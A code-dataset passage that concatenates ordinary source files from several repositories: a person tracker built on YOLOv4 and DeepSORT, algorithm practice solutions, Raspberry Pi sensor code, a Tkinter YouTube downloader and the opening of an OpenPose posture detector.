hist_min[k][0] = min(hist_min[k][0], c[k])
hist_max[k][0] = max(hist_max[k][0], c[k])
df = pd.DataFrame.from_dict(hist)
# df["type"] = "mean"
# df2 = pd.DataFrame.from_dict(hist_min)
# df2["type"] = "min"
# df = df.append(df2)
# df2 = pd.DataFrame.from_dict(hist_max)
# df2["type"] = "max"
# df = df.append(df2)
return df
def score(TP, df, prods, stn, stn_file, alpha, dTs, dTp):
scr = 0
print("Calc score")
df["taskmode"] = df["task"] + "-" + df["mode"]
for j in stn.units:
dfj = df[df["unit"] == j].copy()
dfj = dfj.reset_index()
for rid in np.unique(dfj["id"]):
dfrid = dfj[dfj["id"] == rid]
dem = [[d] for d in dfrid.loc[dfrid.index[0], prods].tolist()]
hist_pred = calc_p_fail_dem(dem, stn_file, j, alpha, TP=TP,
dTs=dTs, dTp=dTp)
c = collections.Counter(dfj.loc[dfj["id"] == rid, "taskmode"])
hist_true = {tm: c[tm] for tm in hist_pred}
scr += sum(np.array([(hist_true[tm] - hist_pred[tm])**2 for tm in
hist_true]))
print(scr)
return scr
class Seq(object):
def __init__(self, tm=[], t=[]):
self.tm = tm
self.t = t
def __iadd__(self, other):
self.tm += other.tm
self.t += other.t
return self
def __add__(self, other):
return Seq(self.tm + other.tm, self.t + other.t)
def __repr__(self):
return 'Seq(%r, %r)' % (self.tm, self.t)
def __len__(self):
return len(self.t)
def pop(self):
return self.tm.pop(), self.t.pop()
class seqGen(object):
def __init__(self, TPfile, stn, dTs, dTp):
self.stn = stn
self.dTs = dTs
self.dTp = dTp
def gen_seqs(N, dem, j, alpha, TPfile, stn0, dTs, dTp, Sinit=None):
Ncpus = 8
global table, D, stn
with open(TPfile, "rb") as f:
TP = dill.load(f)
if Sinit is None:
Sinit = stn.Rinit[j]
stn = stn0
table = {}
tms = set(i + "-" + k for i in stn.I[j] for k in stn.O[j])
for tm in tms:
logreg = TP[j, tm]
for period, d in enumerate(dem[0]):
if logreg is None:
table[tm, period] = pd.DataFrame([1], columns=['0'])
else:
prob = logreg.predict_proba([[d[period] for d in dem]])
table[tm, period] = pd.DataFrame(prob,
columns=logreg.classes_)
D = {"None-None": 0, "M-M": 0}
# calculate all relavent transition probabilities once
for i in stn.I[j]:
for k in stn.O[j]:
tm = i + "-" + k
ptm = stn.p[i, j, k]
Dtm = stn.deg[j].get_mu(tm, ptm)
eps = stn.deg[j].get_eps(alpha, tm, ptm)
D.update({tm: Dtm*(1+eps)})
gen_seq(dem, j, alpha, Sinit, dTp, dTs)
res = Parallel(n_jobs=Ncpus)(delayed(gen_seq)(dem, j, alpha,
Sinit, dTp,
dTs)
for i in range(0, N))
return [[i.tm, i.t] for i in res]
def gen_seq(dem, j, alpha, Sinit, dTp, dTs):
seq = Seq()
tms = set(i + "-" + k for i in stn.I[j] for k in stn.O[j])
for p, d in enumerate(dem[0]):
tmseq = [np.random.choice(table[tm, p].columns.values,
p=table[tm, p].iloc[0, :].values)
for tm in tms]
tmseq = list(map(int, map(float, tmseq)))
tmseq = [tm for i, tm in enumerate(tms) for j in
range(0, tmseq[i])]
tmseq_split = [tuple(tm.split('-')) for tm in tmseq]
dtseq = [stn.p[i, j, k] for i, k in tmseq_split]
if sum(dtseq) > dTp:
c = list(zip(tmseq, dtseq))
np.random.shuffle(c)
tmseq, dtseq = [i for i in map(list, zip(*c))]
while sum(dtseq) > dTp:
tmseq.pop()
dtseq.pop()
Nnn = (dTp - sum(dtseq)) // dTs
tmseq += ["None-None"] * Nnn
dtseq += [dTs] * Nnn
c = list(zip(tmseq, dtseq))
np.random.shuffle(c)
tmseq, dtseq = [i for i in map(list, zip(*c))]
seq += Seq(tmseq, dtseq)
seq = __insert_maint(seq, j, alpha, Sinit, dTp*len(dem[0]))
return seq
def __insert_maint(seq, j, alpha, Sinit, Tp):
tmseq = []
tseq = [0]
s = Sinit
while (len(seq) > 0) and (tseq[-1] < Tp):
tm, dt = seq.pop()
s += D[tm]
if s > stn.Rmax[j]:
tmseq += ["M-M"]
tseq += [tseq[-1] + stn.tau[j]]
s = D[tm]
tmseq += [tm]
tseq += [tseq[-1] + dt]
return Seq(tmseq, tseq[1:])
def get_knn_TP(proffile, dem, k, j):
with open(proffile, "rb") as f:
prof = dill.load(f)
dfj = prof[prof["unit"] == j].copy()
dfj = dfj.reset_index(drop=True)
res = dfj[stn.products + ["id"]].drop_duplicates()
dem = [list(d) for d in zip(*dem)]
for p, d in enumerate(dem):
for i in stn.I[j]:
for k in stn.O[k]:
tm = i + "-" + k
dis = sum([(res[p] - d[i])**2 for i, p in
enumerate(stn.products)])
knn = tuple(res.loc[dis.nsmallest(k).index, "id"])
df = dfj[dfj["id"].isin(knn)]
table[tm, p] = np.cumsum(get_trans_prob(df, tm, j))
def get_trans_prob(df, tm, j):
df["taskmode-1"] = df["taskmode"].shift(-1)
df.loc[pd.isna(df["taskmode"]), "taskmode-1"] = "None-None"
if np.any(df["taskmode"] == tm):
table = get_hist(df[df["taskmode"] == tm], "taskmode-1")
else:
table = get_hist(df[df["taskmode"] == "None-None"], "taskmode-1")
return table
def get_hist(df, col):
table = pd.DataFrame.from_dict(collections.Counter(df[col]),
orient="index")
table = table.rename(columns={0: "count"})
table["p"] = table["count"]/sum(table["count"])
return table
if __name__ == '__main__':
with open('../data/p2.dat', 'rb') as f:
stn = dill.load(f)
seqgen = seqGen('../data/p2freq.pkl', stn, 3, 168)
k = gen_seqs(10, [[2250, 750, 1250, 1750, 2000, 2000, 2000, 2000,
2000]], 'U2', 0.5, '../data/p2freq.pkl', stn, 3, 168)
import ipdb; ipdb.set_trace() # noqa
``` |
{
"source": "Johyeonje/TrackPerformerAlgorism",
"score": 2
} |
#### File: Johyeonje/TrackPerformerAlgorism/object_tracker_cus1.py
```python
import os
# comment out below line to enable tensorflow logging outputs
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import time
import tensorflow as tf
physical_devices = tf.config.experimental.list_physical_devices('GPU')
if len(physical_devices) > 0:
tf.config.experimental.set_memory_growth(physical_devices[0], True)
from absl import app, flags, logging
from absl.flags import FLAGS
import core.utils as utils
from core.yolov4 import filter_boxes
from tensorflow.python.saved_model import tag_constants
from core.config import cfg
from PIL import Image
import cv2
import numpy as np
import matplotlib.pyplot as plt
# from tensorflow.compat.v1 import ConfigProto
# from tensorflow.compat.v1 import InteractiveSession
# deep sort imports
from deep_sort import preprocessing, nn_matching
from deep_sort.detection import Detection
from deep_sort.tracker import Tracker
from tools import generate_detections as gdet
import queue
class Apply_Models(object):
def __init__(self):
# Definition of the parameters
max_cosine_distance = 0.4
nn_budget = None
model_filename = 'model_data/mars-small128.pb'
weights = './checkpoints/yolov4-416'
# create indexing queue
self.indexing = queue.Queue()
# initialize deep sort
self.encoder = gdet.create_box_encoder(model_filename, batch_size=1)
# Set Tracker
self.metric = nn_matching.NearestNeighborDistanceMetric("cosine", max_cosine_distance, nn_budget)
self.tracker = Tracker(self.metric)
# Load Model
self.saved_model_loaded = tf.saved_model.load(weights, tags=[tag_constants.SERVING])
self.infer = self.saved_model_loaded.signatures['serving_default']
def main(self, frame_data):
# Definition of the parameters
nms_max_overlap = 1.0
# set HyperParams
size = 416
iou = 0.45
score = 0.50
info = False
people_num = 4
input_size = size
self.indexing.queue.clear()
for k in range(people_num):
self.indexing.put(k+1)
out = None
frame_data = cv2.cvtColor(frame_data, cv2.COLOR_BGR2RGB)
image_data = cv2.resize(frame_data, (input_size, input_size))
image_data = image_data / 255.
image_data = image_data[np.newaxis, ...].astype(np.float32)
start_time = time.time()
batch_data = tf.constant(image_data)
pred_bbox = self.infer(batch_data) # Yolo ๋ชจ๋ธ ํต๊ณผ์์ผ์ ๋ฐ์ด๋ฉ ๋ฐ์ค ์ขํ ๋ฐํ
for key, value in pred_bbox.items():
boxes = value[:, :, 0:4] # ์ขํ
pred_conf = value[:, :, 4:] # ๋ฒกํฐ๊ฐ
boxes, scores, classes, valid_detections = tf.image.combined_non_max_suppression(
boxes=tf.reshape(boxes, (tf.shape(boxes)[0], -1, 1, 4)),
scores=tf.reshape(
pred_conf, (tf.shape(pred_conf)[0], -1, tf.shape(pred_conf)[-1])),
max_output_size_per_class=50,
max_total_size=50,
iou_threshold=iou,
score_threshold=score
)
# convert data to numpy arrays and slice out unused elements
num_objects = valid_detections.numpy()[0]
bboxes = boxes.numpy()[0]
bboxes = bboxes[0:int(num_objects)]
scores = scores.numpy()[0]
scores = scores[0:int(num_objects)]
classes = classes.numpy()[0]
classes = classes[0:int(num_objects)]
# format bounding boxes from normalized ymin, xmin, ymax, xmax ---> xmin, ymin, width, height
original_h, original_w, _ = frame_data.shape
bboxes = utils.format_boxes(bboxes, original_h, original_w)
# store all predictions in one parameter for simplicity when calling functions
pred_bbox = [bboxes, scores, classes, num_objects]
# read in all class names from config
class_names = utils.read_class_names(cfg.YOLO.CLASSES)
# by default allow all classes in .names file
# allowed_classes = list(class_names.values())
# custom allowed classes (uncomment line below to customize tracker for only people)
allowed_classes = ['person']
# loop through objects and use class index to get class name, allow only classes in allowed_classes list
names = []
deleted_indx = []
for i in range(num_objects):
class_indx = int(classes[i])
class_name = class_names[class_indx]
if class_name not in allowed_classes:
deleted_indx.append(i)
else:
names.append(class_name)
names = np.array(names)
count = len(names)
if count:
cv2.putText(frame_data, "Objects being tracked: {}".format(count), (5, 35), cv2.FONT_HERSHEY_COMPLEX_SMALL,
2,(0, 255, 0), 2)
# print("Objects being tracked: {}".format(count))
# delete detections that are not in allowed_classes
bboxes = np.delete(bboxes, deleted_indx, axis=0)
scores = np.delete(scores, deleted_indx, axis=0)
# encode yolo detections and feed to tracker
features = self.encoder(frame_data, bboxes)
detections = [Detection(bbox, score, class_name, feature) for bbox, score, class_name, feature in
zip(bboxes, scores, names, features)]
# initialize color map
cmap = plt.get_cmap('tab20b')
colors = [cmap(i)[:3] for i in np.linspace(0, 1, 20)]
# run non-maxima supression
boxs = np.array([d.tlwh for d in detections])
scores = np.array([d.confidence for d in detections])
classes = np.array([d.class_name for d in detections])
indices = preprocessing.non_max_suppression(boxs, classes, nms_max_overlap, scores)
detections = [detections[i] for i in indices]
# DeepSort Tracking Start
# Call the tracker
self.tracker.predict() # load tracker
self.tracker.update(detections)
#check is_confirmed
is_not_confirmed = 0
tracks_count = 0
for w, track in enumerate(self.tracker.tracks):
tracks_count += 1
# print('count', tracks_count)
# update tracks
for index, track in enumerate(self.tracker.tracks):
if not track.is_confirmed() or track.time_since_update > 1:
is_not_confirmed += 1
continue
if index-is_not_confirmed+1 > people_num:
break
bbox = track.to_tlbr()
class_name = track.get_class()
# draw bbox on screen # ์ด๊ฑฐ ์ฒ๋ฆฌ๊น์ง ํ๊ณ ๋์ ๋ณด๋ด์ผ ํ ๊ฒ ๊ฐ๋ค.
for i in range(self.indexing.qsize()):
check_index = self.indexing.get()
if track.track_id == check_index:
color = colors[int(track.track_id)*8 % len(colors)]
color = [j * 255 for j in color]
cv2.rectangle(frame_data, (int(bbox[0]), int(bbox[1])), (int(bbox[2]), int(bbox[3])), color, 2)
cv2.rectangle(frame_data, (int(bbox[0]), int(bbox[1] - 30)),
(int(bbox[0]) + (len(class_name) + len(str(track.track_id))) * 17, int(bbox[1])),
color, -1)
cv2.putText(frame_data, class_name + "-" + str(track.track_id),
(int(bbox[0]), int(bbox[1] - 10)), 0, 0.75,
(255, 255, 255), 2)
break
else:
self.indexing.put(check_index)
if i == self.indexing.qsize() - 1:
cng_index = self.indexing.get()
print('index changed', track.track_id, '->', cng_index)
# track.track_id = cng_index
color = colors[int(cng_index)*8 % len(colors)]
color = [j * 255 for j in color]
cv2.rectangle(frame_data, (int(bbox[0]), int(bbox[1])), (int(bbox[2]), int(bbox[3])), color, 2)
cv2.rectangle(frame_data, (int(bbox[0]), int(bbox[1] - 30)),
(int(bbox[0]) + (len(class_name) + len(str(cng_index))) * 17, int(bbox[1])),
color, -1)
cv2.putText(frame_data, class_name + "-" + str(cng_index),
(int(bbox[0]), int(bbox[1] - 10)), 0, 0.75,
(255, 255, 255), 2)
# if enable info flag then print details about each track
if info:
print("Tracker ID: {}, Class: {}, BBox Coords (xmin, ymin, xmax, ymax): {}".format(str(track.track_id),
class_name, (
int(bbox[0]),
int(bbox[1]),
int(bbox[2]),
int(bbox[3]))))
# calculate frames per second of running detections
fps = 1.0 / (time.time() - start_time)
# print("FPS: %.2f" % fps)
result = cv2.cvtColor(frame_data, cv2.COLOR_RGB2BGR)
return result
```
#### File: Johyeonje/TrackPerformerAlgorism/Prototype_size_regulation.py
```python
__author__ = "<NAME>"
__copyright__ = "Copyright 2016, kurokesu.com"
__version__ = "0.1"
__license__ = "GPL"
import tensorflow as tf
from deep_sort import nn_matching
from CoreTech import Apply_Models
from deep_sort.tracker import Tracker
import time
import queue
import sys
import threading
import cv2
from PyQt5 import uic
from PyQt5.QtCore import Qt, QUrl, QSize, QPoint, QTimer
from PyQt5.QtGui import QIcon, QFont, QPainter, QImage
from PyQt5.QtWidgets import (QApplication, QFileDialog, QHBoxLayout, QPushButton, QSlider, QStyle, QVBoxLayout, QWidget,
QStatusBar, QMainWindow,
QAction, qApp)
from tensorflow.python.saved_model import tag_constants
running = False
capture_thread = None
form_class = uic.loadUiType("simple.ui")[0]
q = queue.Queue()
def grab(cam, queue, width, height, fps):
global running
capture = cv2.VideoCapture(cam)
capture.set(cv2.CAP_PROP_FRAME_WIDTH, width)
capture.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
capture.set(cv2.CAP_PROP_FPS, fps)
apply = Apply_Models()
while running:
start_time = time.time()
frame = {}
capture.grab()
retval, img = capture.retrieve(0)
img[:87, :] = 0
img = apply.main(img)
frame["img"] = img
fps = 1.0 / (time.time() - start_time)
print("FPS : %.3f"%(fps))
if queue.qsize() < 10:
queue.put(frame)
else:
print
queue.qsize()
class OwnImageWidget(QWidget):
def __init__(self, parent=None):
super(OwnImageWidget, self).__init__(parent)
self.image = None
def setImage(self, image): # ์ด ์ฝ๋์ Yolov4 ์ ์ฉํ๋ฉด ๋ ๊ฒ์ผ๋ก ๋ณด์
self.image = image
sz = image.size()
self.setMinimumSize(sz)
self.update()
def paintEvent(self, event):
qp = QPainter()
qp.begin(self)
if self.image:
qp.drawImage(QPoint(0, 0), self.image)
qp.end()
class MyWindowClass(QMainWindow, form_class):
def __init__(self, parent=None):
QMainWindow.__init__(self, parent)
self.setupUi(self)
self.initUI()
self.startButton.clicked.connect(self.start_clicked)
self.window_width = self.ImgWidget.frameSize().width()
self.window_height = self.ImgWidget.frameSize().height()
self.ImgWidget = OwnImageWidget(self.ImgWidget)
self.timer = QTimer(self)
self.timer.timeout.connect(self.update_frame)
self.timer.start(1)
def initUI(self):
camAction = QAction('Use Cam', self)
camAction.setShortcut('Ctrl+C')
camAction.setStatusTip('Use Cam')
camAction.triggered.connect(self.start_clicked)
exitAction = QAction('Exit', self)
exitAction.setShortcut('Ctrl+Q')
exitAction.setStatusTip('Exit application')
exitAction.triggered.connect(qApp.quit)
self.statusBar()
menubar = self.menuBar()
menubar.setNativeMenuBar(False)
filemenu = menubar.addMenu('&File')
filemenu.addAction(camAction)
filemenu.addAction(exitAction)
def start_clicked(self):
global running
running = True
capture_thread.start()
self.startButton.setEnabled(False)
self.startButton.setText('Starting...')
def update_frame(self):
if not q.empty():
self.startButton.setText('Camera is live')
frame = q.get()
img = frame["img"]
img_height, img_width, img_colors = img.shape
scale_w = float(self.window_width) / float(img_width)
scale_h = float(self.window_height) / float(img_height)
scale = min([scale_w, scale_h])
if scale == 0:
scale = 1
img = cv2.resize(img, None, fx=scale, fy=scale, interpolation=cv2.INTER_CUBIC)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
height, width, bpc = img.shape
bpl = bpc * width
image = QImage(img.data, width, height, bpl, QImage.Format_RGB888)
self.ImgWidget.setImage(image)
def closeEvent(self, event):
global running
running = False
capture_thread = threading.Thread(target=grab, args=('./data/video/tttt1.mp4', q, 1920, 1080, 30))
if __name__ == '__main__':
app = QApplication(sys.argv)
w = MyWindowClass(None)
w.setWindowTitle('Kurokesu PyQT OpenCV USB camera test panel')
w.show()
app.exec_()
```
#### File: Johyeonje/TrackPerformerAlgorism/TPD_evaluate.py
```python
import numpy as np
import pandas as pd
def evaluate_TPD(path):
xlsx = pd.read_excel(path, header=None)
score = 0.
frame_size = xlsx.shape[0]
print(frame_size)
for t in range(frame_size):
det_obj = xlsx.shape[1]
trac_obj = xlsx.shape[1]
for n in range(1, xlsx.shape[1]+1):
if n != int(xlsx.iloc[t, n-1]):
if xlsx.iloc[t, n-1] == 0:
det_obj -= 1
trac_obj -= 1
else:
trac_obj -= 1
tpd = trac_obj / det_obj
score += tpd
print('TPD :%.9f'%(score/frame_size))
if __name__ == "__main__":
path = 'C:/Users/์ด์นํ/Desktop/GIT/TrackPerformerAlgorism/excel/test1_our_deepsort_labels.xlsx'
print(path.split('/')[1], 'files operation..')
evaluate_TPD(path)
``` |
{
"source": "JoHyukJun/algorithm-analysis",
"score": 4
} |
#### File: source/python/4Sum.py
```python
class Solution:
def fourSum(self, nums: List[int], target: int) -> List[List[int]]:
output = []
alpha_basis = 0
beta_basis = 0
head = 0
tail = 0
temp_set = set()
ckr = 0
if (len(nums) < 4):
return output
nums.sort()
for alpha_basis in range (len(nums) - 2):
for beta_basis in range(alpha_basis + 1, len(nums)):
head = beta_basis + 1
tail = len(nums) - 1
ckr = target - nums[alpha_basis] - nums[beta_basis]
while head < tail:
if (ckr == nums[head] + nums[tail]):
temp_set.add((nums[alpha_basis],
nums[beta_basis],
nums[head],
nums[tail]))
head += 1
tail -= 1
elif ckr < nums[head] + nums[tail]:
tail -= 1
else:
head += 1
output = list(temp_set)
return output
```
#### File: source/python/ArrayPartition1.py
```python
class Solution:
def arrayPairSum(self, nums: List[int]) -> int:
return sum(sorted(nums)[::2])
```
#### File: source/python/AvodingSameNumber.py
```python
def solution(arr):
answer = []
answer.append(arr[0])
for i in range(1, len(arr)):
if (arr[i] == arr[i - 1]):
continue
else:
answer.append(arr[i])
return answer
```
#### File: source/python/BestTimeToBuyAndSAellStock.py
```python
class Solution:
def maxProfit(self, prices: List[int]) -> int:
output = 0
m_price = sys.maxsize
for p in prices:
m_price = min(p, m_price)
output = max(output, p - m_price)
return output
```
#### File: source/python/BreakWall.py
```python
import sys
from collections import deque
def bfs(in_x, in_y, in_z):
queue = deque([(in_x, in_y, in_z)])
while queue:
x, y, z = queue.popleft()
if x == n - 1 and y == m - 1:
return visited[x][y][z]
for i in range(4):
nx = x + dx[i]
ny = y + dy[i]
if nx >= 0 and ny >= 0 and nx < n and ny < m:
if arr[nx][ny] == 1 and z == 1:
visited[nx][ny][z - 1] = visited[x][y][z] + 1
queue.append((nx, ny, z - 1))
elif arr[nx][ny] == 0 and visited[nx][ny][z] == 0:
visited[nx][ny][z] = visited[x][y][z] + 1
queue.append((nx, ny, z))
return -1
n, m = map(int, sys.stdin.readline().rstrip().split(' '))
arr = []
answer = []
for _ in range(n):
arr.append(list(map(int, sys.stdin.readline().rstrip())))
dx = [1, -1, 0, 0]
dy = [0, 0, 1, -1]
visited = [[[0] * 2 for _ in range(m)] for _ in range(n)]
visited[0][0][1] = 1
print(bfs(0, 0, 1))
```
#### File: source/python/Ending.py
```python
def solution(n, words):
answer = []
ckr = []
ckr.append(words[0])
for i in range(1, len(words)):
user = i % n
num = i // n
if words[i][0] != words[i - 1][-1]:
answer.append(user + 1)
answer.append(num + 1)
return answer
if words[i] in ckr:
answer.append(user + 1)
answer.append(num + 1)
return answer
else:
ckr.append(words[i])
answer.append(0)
answer.append(0)
return answer
```
#### File: source/python/FibonacciFunction.py
```python
t = int(input())
dp = [(0, 0) for _ in range(41)]
dp[0] = (1, 0)
dp[1] = (0, 1)
def fiv_counter():
global dp
for i in range(2, 41):
dp[i] = (dp[i - 1][0] + dp[i - 2][0], dp[i - 1][1] + dp[i - 2][1])
fiv_counter()
for _ in range(t):
n = int(input())
print(dp[n][0], dp[n][1])
```
#### File: source/python/LongestPalindromicSubstring.py
```python
class Solution:
def longestPalindrome(self, s: str) -> str:
output = ''
cnt = 0
if len(s) == 0:
return output
for idx in range(0, len(s)):
for iidx in range(idx + len(output), len(s) + 1):
forward = s[idx:iidx]
backward = forward[::-1]
if forward == backward:
temp = forward
if len(temp) > len(output):
output = temp
return output
```
#### File: source/python/LSWRC.py
```python
class Solution:
def lengthOfLongestSubstring(self, s: str) -> int:
output = 0
str_set = []
for idx, val in enumerate(s):
if val in str_set:
str_set = str_set[str_set.index(val) + 1:]
str_set.append(val)
output = max(output, len(str_set))
return output
```
#### File: source/python/MonkeyWantingToBeAHorse.py
```python
import sys
from collections import deque
def bfs():
queue = deque([(0, 0, 0)])
while queue:
x, y, z = queue.popleft()
if x == h - 1 and y == w - 1:
return visited[x][y][z] - 1
# monkey move
for i in range(4):
nx = x + mm[i][0]
ny = y + mm[i][1]
if nx >= 0 and ny >= 0 and nx < h and ny < w and not visited[nx][ny][z] and arr[nx][ny] == 0:
queue.append((nx, ny, z))
visited[nx][ny][z] = visited[x][y][z] + 1
# horse move
if z < k:
for i in range(8):
nx = x + hm[i][0]
ny = y + hm[i][1]
if nx >= 0 and ny >= 0 and nx < h and ny < w and not visited[nx][ny][z + 1] and arr[nx][ny] == 0:
queue.append((nx, ny, z + 1))
visited[nx][ny][z + 1] = visited[x][y][z] + 1
return -1
k = int(sys.stdin.readline())
w, h = map(int, sys.stdin.readline().rstrip().split(' '))
arr = []
for _ in range(h):
arr.append(list(map(int, sys.stdin.readline().rstrip().split(' '))))
visited = [[[0 for _ in range(k + 1)] for _ in range(w)] for _ in range(h)]
visited[0][0][0] = 1
mm = [(-1, 0), (1, 0), (0, 1), (0, -1)]
hm = [(-1, -2), (-2, -1), (-2, 1), (-1, 2), (1, -2), (2, -1), (2, 1), (1, 2)]
print(bfs())
```
#### File: source/python/PermutationCycle.py
```python
import sys
def dfs(idx):
visited[idx] = 1
next_idx = arr[idx]
if not visited[next_idx]:
dfs(next_idx)
t = int(sys.stdin.readline())
for _ in range(t):
n = int(sys.stdin.readline())
arr = [0] + list(map(int, sys.stdin.readline().rstrip().split(' ')))
visited = [0 for _ in range(n + 1)]
visited[0] = 1
answer = 0
for i in range(1, n + 1):
if not visited[i]:
dfs(i)
answer += 1
print(answer)
```
#### File: source/python/SkillTree.py
```python
def solution(skill, skill_trees):
answer = 0
skill_stack = list(skill)
for v in skill_trees:
tmp = []
is_ok = True
cur_skill = list(v)
for i in range(len(cur_skill)):
if cur_skill[i] in skill_stack:
tmp.append(cur_skill[i])
if tmp != skill_stack[:len(tmp)]:
is_ok = False
break
if is_ok:
answer += 1
return answer
```
#### File: source/python/ValidPalindrome.py
```python
class Solution:
def valid_palindrome(self, s: str) -> bool:
output = True
ckr: Deque = collections.deque()
for c in s:
if c.isalpha() or c.isdigit():
ckr.append(c.lower())
while len(ckr) > 1:
if ckr.pop() == ckr.popleft():
continue
else:
output = False
return output
return output
``` |
{
"source": "JoHyukJun/RasberryPiLab",
"score": 3
} |
#### File: doodle/test03/testcode04.py
```python
import RPi.GPIO as GPIO
import time
usleep = lambda x : time.sleep(x / 1000000.0)
import datetime as dt
TP = 4
EP = 17
def getDistance():
fDistance = 0.0
nStartTime, nEndTime = 0, 0
GPIO.output(TP, GPIO.LOW)
usleep(2)
GPIO.output(TP, GPIO.HIGH)
usleep(10)
GPIO.output(TP, GPIO.LOW)
while(GPIO.input(EP) == GPIO.LOW):
pass
nStartTime = dt.datetime.now()
while(GPIO.input(EP) == GPIO.HIGH):
pass
nEndTime = dt.datetime.now()
fDistance = (nEndTime - nStartTime).microseconds / 29. / 2.
return fDistance
GPIO.setmode(GPIO.BCM)
GPIO.setup(TP, GPIO.OUT, initial = GPIO.LOW)
GPIO.setup(EP, GPIO.IN)
time.sleep(0.5)
while(1):
fDistance = getDistance()
print(fDistance)
time.sleep(1)
``` |
{
"source": "JoHyukJun/youtube-downloader",
"score": 3
} |
#### File: youtube-downloader/source/main.py
```python
import os
from pathlib import Path
from tkinter import *
from tkinter import ttk
from tkinter import font
from pytube import YouTube
BASE_DIR = Path(__file__).resolve(strict=True).parent
class Application(Frame):
def __init__(self, master=None):
super().__init__(master)
self.master = master
self.window_settings()
self.grid()
self.create_widgets()
def create_widgets(self):
jFont = font.Font(family="๋ง์ ๊ณ ๋", size=12)
self.url_input_lable = Label(self, text="์ ํ๋ธ URL์ ์
๋ ฅํ์ธ์.", font=jFont, width=40)
self.url_input_entry = Entry(self, font=jFont, width=40)
self.video_list = Listbox(self, font=jFont, width=40)
self.lookup_button = Button(self, text="์กฐํ", font=jFont, command=lambda:self.button_cmd('lookup', self.url_input_entry.get()))
self.download_button = Button(self, text="๋ค์ด๋ก๋", font=jFont, command=lambda:self.button_cmd('download', self.url_input_entry.get()))
self.download_prg_bar = ttk.Progressbar(self, length=400, mode='determinate')
'''
layout settings
'''
self.url_input_lable.grid(row=0, padx=2, pady=2)
self.url_input_entry.grid(row=1, column=0, padx=2, pady=2)
self.video_list.grid(row=1, column=1, padx=2, pady=2)
self.download_button.grid(row=2, column=0, padx=2, pady=2)
self.lookup_button.grid(row=2, column=1, padx=2, pady=2)
self.download_prg_bar.grid(row=3, padx=2, pady=2)
return
def window_settings(self):
self.master.title("Youtube Downloader")
self.master.geometry("800x400+0+0")
self.master.iconbitmap(BASE_DIR / 'static/images/unluckystrike_logo_clear.ico')
return
def button_cmd(self, value, url):
yt = YouTube(url, on_progress_callback=self.progressbar_cmd)
if value == 'download':
selection = self.video_list.get(self.video_list.curselection())
selection = selection.split(' ')
print(selection)
pre_itag = selection[1].split('=')
pre_itag = pre_itag[1].split('"')
itag = int(pre_itag[1])
print(itag)
#d_stream = yt.streams.first()
d_stream = yt.streams.get_by_itag(itag)
d_stream.download(BASE_DIR / 'download')
elif value == 'lookup':
l_stream = yt.streams
# video list box init
self.video_list.delete(0, END)
for idx, stream in enumerate(l_stream.all()):
self.video_list.insert(END, str(stream))
self.video_list.update()
else:
return
return
def progressbar_cmd(self, stream, chunk, bytes_remaining):
size = stream.filesize
progress = (float(abs(bytes_remaining - size) / size)) * float(100)
self.download_prg_bar['value'] = progress
self.download_prg_bar.update()
return
def main():
root = Tk()
app = Application(master=root)
app.mainloop()
if __name__ == '__main__':
main()
``` |
{
"source": "johyy/lukuvinkkikirjasto",
"score": 4
} |
#### File: src/entities/user.py
```python
class UserAccount():
""" Class that represents a single user. """
def __init__(self, username, password):
""" Class constructor. Creates a new user.
Attributes:
_username: [String] Unique identifier of the user.
_password: [String] Password of the user profile.
"""
self._username = username
self._password = password
self._recommendations = []
self._admin = False
def get_username(self):
""" Gets the name of the user."""
return self._username
def get_password(self):
""" Gets the password of the user."""
return self._password
def set_username(self, username):
""" Sets username.
Args:
username: [String] The username to be set.
"""
self._username = username
def set_password(self, password):
""" Sets user's password.
Args:
password: [String] The password to be set.
"""
self._password = password
def set_admin(self, boolean):
""" Sets user's admin status.
Args:
admin: [boolean] The admin status to be set.
"""
self._admin = boolean
def add_recommendation(self, recommendation):
""" Adds a recommendation to the user."""
self._recommendations.append(recommendation)
def remove_recommendation(self, recommendation):
""" Removes a recommendation to the user."""
if recommendation in self._recommendations:
self._recommendations.remove(recommendation)
def get_recommendations(self):
""" Returns user's recommendations."""
return self._recommendations
def is_admin(self):
return self._admin
```
#### File: src/repositories/user_repository.py
```python
from db import db
class UserRepository:
"""Class that handles database queries for users"""
def __init__(self):
"""Class constructor"""
def add_a_new_user(self, user):
"""Adds a new user"""
try:
sql = "INSERT INTO users (username, password, admin) VALUES (:username, :password, :admin)"
db.session.execute(sql, {"username": user.get_username(
), "password": user.get_password(), "admin": user.is_admin()})
db.session.commit()
return True
except Exception as exception:
print(exception)
return False
def get_user(self, username):
"""Returns user"""
sql = "SELECT username, password, admin, rowid FROM users WHERE username=:username"
result = db.session.execute(sql, {"username": username})
user = result.fetchone()
if not user:
return False
return user
def get_user_by_id(self, user_id):
"""Returns user"""
sql = "SELECT username, password, admin, rowid FROM users WHERE rowid=:rowid"
result = db.session.execute(sql, {"rowid": user_id})
user = result.fetchone()
if not user:
return False
return user
def delete_all(self):
sql = """DELETE FROM users"""
db.session.execute(sql)
db.session.commit()
user_repository = UserRepository()
``` |
{
"source": "JoiceV/Detecta-a-posi-o-sentada-de-uma-pessoa",
"score": 2
} |
#### File: JoiceV/Detecta-a-posi-o-sentada-de-uma-pessoa/posture_image.py
```python
import cv2
import math
import time
import numpy as np
import util
from config_reader import config_reader
from scipy.ndimage.filters import gaussian_filter
from model import get_testing_model
tic=0
# visualize
colors = [[255, 0, 0], [255, 85, 0], [255, 170, 0], [255, 255, 0], [170, 255, 0], [85, 255, 0],
[0, 255, 0], \
[0, 255, 85], [0, 255, 170], [0, 255, 255], [0, 170, 255], [0, 85, 255], [0, 0, 255],
[85, 0, 255], \
[170, 0, 255], [255, 0, 255], [255, 0, 170], [255, 0, 85]]
def process (input_image, params, model_params):
''' Start of finding the Key points of full body using Open Pose.'''
oriImg = cv2.imread(input_image) # B,G,R order
multiplier = [x * model_params['boxsize'] / oriImg.shape[0] for x in params['scale_search']]
heatmap_avg = np.zeros((oriImg.shape[0], oriImg.shape[1], 19))
paf_avg = np.zeros((oriImg.shape[0], oriImg.shape[1], 38))
for m in range(1):
scale = multiplier[m]
imageToTest = cv2.resize(oriImg, (0, 0), fx=scale, fy=scale, interpolation=cv2.INTER_CUBIC)
imageToTest_padded, pad = util.padRightDownCorner(imageToTest, model_params['stride'],
model_params['padValue'])
input_img = np.transpose(np.float32(imageToTest_padded[:,:,:,np.newaxis]), (3,0,1,2)) # required shape (1, width, height, channels)
output_blobs = model.predict(input_img)
